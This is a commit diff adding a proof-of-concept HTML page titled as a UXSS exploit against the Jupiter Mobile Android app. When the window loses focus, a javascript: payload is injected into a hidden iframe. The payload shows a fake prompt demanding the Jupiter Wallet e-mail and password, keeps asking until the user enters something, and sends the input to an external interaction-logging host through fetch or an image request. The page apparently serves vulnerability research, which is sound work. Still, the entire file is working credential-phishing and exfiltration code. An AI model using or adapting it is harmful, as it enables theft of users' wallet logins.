Add files via upload

Author: avicoder

POC/poc.html

@@ -0,0 +1,41 @@
+<html lang="en-US">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, user-scalable=no">
+  <title>UXSS (Jupiter Mobile Android)</title>
+  <style>
+    iframe { visibility: hidden; }
+    body { font-family: system-ui, sans-serif; text-align: center; padding-top: 100px; }
+  </style>
+  <script>
+    window.onblur = function () {
+      const loginPromptMessage = 'In order to access Jupiter Mobile\n' +
+                                'you must first login on your\nJupiter Wallet Account.\n\n' +
+                                'Please type your e-mail\nand your password:';
+
+      // Payload to execute in iframe via javascript: (GET webhook)
+      const iframeScriptPayload =
+        "(function(){try{" +
+          "var promptMessage=" + JSON.stringify(loginPromptMessage) + ";" +
+          "var userInput='';" +
+          // Force input: Cancel/empty loops until valid
+          "while(userInput===null||(''+userInput).trim()===''){ userInput=prompt(promptMessage,'E-mail / Password.'); }" +
+          // Build URL for GET webhook
+          "var webhookUrl=" + JSON.stringify("https://kfolxxnghaeuziyteiecvsfddt725uimk.oast.fun/") + ";" +
+          "var queryString='?credentials='+encodeURIComponent(userInput);" +
+          "var requestUrl=webhookUrl+queryString;" +
+          // Attempt fetch GET (no-cors, keepalive), fallback to Image GET (anti-cache with &via=img)
+          "try{ fetch(requestUrl,{method:'GET',mode:'no-cors',keepalive:true}).catch(function(_){" +
+          "  try{ (new Image()).src=requestUrl+'&via=img'; }catch(__){}" +
+          "}); }catch(e){ try{ (new Image()).src=requestUrl+'&via=img'; }catch(__){} }" +
+        "}catch(e){}})()";
+
+      document.getElementById('iframe').src = "javascript:" + iframeScriptPayload;
+    };
+  </script>
+</head>
+<body>
+  <h1>Click Here</h1>
+  <iframe id="iframe"></iframe>
+</body>
+</html>